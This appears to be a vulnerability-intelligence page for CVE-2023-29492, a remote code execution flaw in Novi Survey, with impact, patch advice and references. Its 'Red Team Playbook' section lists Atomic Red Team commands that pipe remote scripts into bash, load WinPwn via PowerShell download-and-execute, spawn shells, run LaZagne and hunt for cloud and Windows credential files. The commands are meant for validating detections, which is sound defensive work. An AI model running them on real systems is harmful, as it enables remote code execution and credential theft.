CVE-2023-29492
Overview
The vulnerability is a remote code execution flaw caused by improper handling of user-supplied input that leads to unsafe code evaluation within the Novi Survey application. Specifically, the issue stems from insecure dynamic code execution mechanisms in the server-side processing component, which executes input without adequate validation or sanitization. This affects versions of Novi Survey prior to 8.9.43676, impacting the service account context under which the application runs.
Vulnerability Description
Novi Survey before 8.9.43676 allows remote attackers to execute arbitrary code on the server in the context of the service account. This does not provide access to stored survey or response data.
Impact
An unauthenticated remote attacker can execute arbitrary code on the server with the privileges of the service account running Novi Survey. This allows full control over the affected server environment, enabling actions such as installing malware, modifying system files, or disrupting service availability. The attacker does not gain direct access to stored survey or response data but can compromise the underlying system, potentially leading to broader network compromise or persistent backdoors.
Solution
Upgrade Novi Survey to version 8.9.43676 or later as detailed in the vendor’s security advisory at https://novisurvey.net/blog/novi-survey-security-advisory-apr-2023.aspx. The vendor has addressed the unsafe code execution flaw in this release. No alternative workarounds are provided; applying the official patch is required to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Novi Survey prior to version 8.9.43676 presents a critical risk due to its ability to allow remote attackers to execute arbitrary code on the server. This flaw arises from improper input validation and insufficient security controls, which can be exploited to gain unauthorized access to the server's functionalities. The execution of arbitrary code occurs in the context of the service account, which typically has elevated privileges, thereby amplifying the potential impact of an attack. This vulnerability does not directly compromise stored survey or response data, but the ability to execute code on the server can lead to further exploitation or manipulation of the application environment.
Attack vectors for this vulnerability are primarily remote, allowing attackers to exploit it without needing physical access to the affected system. The exploitation could occur through various means, such as sending specially crafted requests to the server that trigger the vulnerable code paths. Attackers may leverage this flaw to deploy malware, create backdoors, or manipulate server processes to achieve their objectives. Scenarios may include using the compromised server to launch further attacks against internal networks or pivoting to other systems that may contain sensitive data. The risk is exacerbated in environments where Novi Survey is integrated with other applications or services, potentially leading to a broader compromise.
The real-world impact of this vulnerability can be significant for organizations utilizing Novi Survey. Given the high CVSS score of 9.8, the vulnerability is classified as critical, indicating that successful exploitation could lead to severe consequences. Businesses may face operational disruptions, reputational damage, and financial losses due to the unauthorized execution of code. Additionally, organizations may encounter regulatory scrutiny if the exploitation leads to data breaches or non-compliance with data protection regulations. The potential for attackers to leverage the compromised server for further malicious activities poses a substantial business risk, particularly for organizations that rely on the integrity and security of their survey data.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating and patching the Novi Survey application to the latest version is crucial to eliminate the risk associated with known vulnerabilities. Implementing robust input validation and sanitization measures can help prevent exploitation attempts. Organizations should also conduct regular security assessments, including vulnerability scanning and penetration testing, to identify and address potential weaknesses in their systems. Additionally, monitoring server logs for unusual activity can aid in early detection of exploitation attempts. Employing network segmentation and least privilege principles can further reduce the attack surface and limit the potential impact of a successful exploit.
In conclusion, the vulnerability in Novi Survey represents a significant threat to organizations that utilize this application. The ability for remote attackers to execute arbitrary code underscores the importance of maintaining up-to-date software and implementing strong security practices. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Proactive measures, including timely updates, thorough security assessments, and vigilant monitoring, are essential to safeguarding against the risks posed by this and similar vulnerabilities in the future.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
3rdmill | Novi Survey | All |
cpe:2.3:a:3rdmill:novi_survey:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-29492 |
| novisurvey.net |
GitHub CVE
|
https://novisurvey.net/blog/novi-survey-security-advisory-apr-2023.aspx |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-29492 |